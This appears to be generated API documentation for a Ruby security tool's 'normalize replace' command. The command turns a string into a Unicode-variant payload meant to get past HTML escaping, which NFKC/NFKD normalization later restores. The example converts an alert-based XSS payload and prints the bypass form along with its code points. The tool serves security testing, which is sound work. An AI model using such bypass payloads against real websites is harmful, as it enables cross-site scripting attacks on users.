Class: Unisec::CLI::Commands::Normalize::Replace

Inherits:
Dry::CLI::Command
  • Object
show all
Defined in:
lib/unisec/cli/normalization.rb

Overview

Command ‘unisec normalize replace “example”`

Example:

“‘plaintext ➜ unisec normalize replace “<svg onload="alert(’XSS’)">” Original: <svg onload=“alert(‘XSS’)”>

U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

Bypass payload: ﹤svg onload="alert('XSS')"﹥

U+FE64 U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+FF02 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+FF07 U+0058 U+0053 U+0053 U+FF07 U+0029 U+FF02 U+FE65

NFKC: <svg onload=“alert(‘XSS’)”>

U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

NFKD: <svg onload=“alert(‘XSS’)”>

U+003C U+0073 U+0076 U+0067 U+0020 U+006F U+006E U+006C U+006F U+0061 U+0064 U+003D U+0022 U+0061 U+006C U+0065 U+0072 U+0074 U+0028 U+0027 U+0058 U+0053 U+0053 U+0027 U+0029 U+0022 U+003E

➜ echo -n “<svg onload="alert(‘XSS’)">” | unisec normalize replace - “‘

Instance Method Summary collapse

Instance Method Details

#call(input: nil, **_options) ⇒ Object

Prepare a XSS payload for HTML escape bypass (HTML escape followed by NFKC / NFKD normalization)

Parameters:

  • input (String) (defaults to: nil)

    Input string to normalize



79
80
81
82
 
# File 'lib/unisec/cli/normalization.rb', line 79

def call(input: nil, **_options)
  input = $stdin.read.chomp if input == '-'
  puts Unisec::Normalization.new(input).display_replace
end